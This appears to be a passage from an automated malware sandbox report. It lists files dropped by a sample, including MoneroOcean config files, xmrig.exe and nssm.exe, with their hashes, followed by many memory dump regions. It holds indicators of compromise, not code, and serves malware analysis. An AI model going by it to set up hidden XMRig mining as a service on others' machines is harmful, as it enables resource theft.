28b033f20fed45272cd93958bb9d702d

SHA1
ae101de366eb0c8f9cf04950008bcff387eae7b0

SHA256
e133fd36678ba7967535f073a96aa3f0f1088b47b2aee9ccb03e8bb92d1a1200

SHA512
fecc60c2891e75668dc5acf9eaf8eccf244f79222f92965e1cd214b371bdf35a82f687aa6e5942a77584486ced854d4c0ba1c33cb10cb306813bcb440c265ad7

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/2320-7-0x000001F684450000-0x000001F684472000-memory.dmp

Filesize
136KB

Download
memory/3588-26-0x000001BAAB680000-0x000001BAAB68A000-memory.dmp

Filesize
40KB

Download
memory/3588-27-0x000001BAADBD0000-0x000001BAADBE2000-memory.dmp

Filesize
72KB

Download
memory/4036-53-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4036-52-0x0000000001350000-0x0000000001370000-memory.dmp

Filesize
128KB

Download
memory/4620-201-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-217-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-187-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-188-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-189-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-190-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-191-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-192-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-193-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-194-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-195-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-196-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-197-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-198-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-199-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-200-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-185-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-202-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-203-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-204-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-205-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-206-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-207-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-208-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-209-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-210-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-211-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-212-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-213-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-214-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-215-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-186-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-218-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-219-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-220-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-221-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-222-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-223-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-224-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-225-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-226-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-227-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-228-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-229-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-230-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-231-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-232-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-233-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-234-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-235-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-236-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-237-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-238-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-239-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-240-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-241-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-242-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-243-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-244-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-245-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4620-246-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download